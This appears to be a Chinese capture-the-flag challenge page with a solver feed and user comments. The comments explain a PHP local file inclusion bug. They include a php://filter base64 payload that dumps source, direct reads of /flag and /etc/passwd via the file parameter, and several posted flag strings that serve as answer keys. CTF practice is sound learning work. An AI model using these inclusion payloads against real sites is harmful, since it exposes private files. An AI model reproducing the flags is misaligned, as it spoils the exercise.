评分(11)
解题动态

SX9 攻破了该题 16小时前

Irene 攻破了该题 1天前

纯情内向小学生 攻破了该题 1天前

123^% 攻破了该题 2天前

ovdoes 攻破了该题 2天前

13097932959 攻破了该题 2天前

藕藕藕是木薯 攻破了该题 2天前

笨蛋奶妈 攻破了该题 2天前

XHtzl99 攻破了该题 2天前

Noctis 攻破了该题 2天前

Miki2 攻破了该题 2天前

汤圆儿安 攻破了该题 3天前

keduolim 攻破了该题 3天前

灵梦归希 攻破了该题 4天前

1163064874 攻破了该题 4天前

kl01 攻破了该题 4天前

1393385937 攻破了该题 4天前

BVzero 攻破了该题 4天前

19137537912 攻破了该题 5天前

评论
fonddream 1年前
举报
http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg
大哥大 1年前
举报
http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.
nicchanggh 1年前
举报
flag{e92c0ec08be5fc7e0bd706e697e366fd}
chushou 1年前
举报
flag{ebfea7aca0bd16bb5819c678090ff026}
107zsm 1年前
举报
打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag
小夫 1年前
举报
file=/flag
rightstar 1年前
举报
flag{a1ad1a8522261e6b9abf21e9bd6ef675}
sibeil 1年前
举报
flag{b23328bbf165641292d9871be279459a}
wxy1343 1年前
举报
flag{a15320afe0f7ad00fb16135d7456a9e1}
mircle 2年前
举报
flag{4911bd2afb90b2abf40a02b45e6979ac}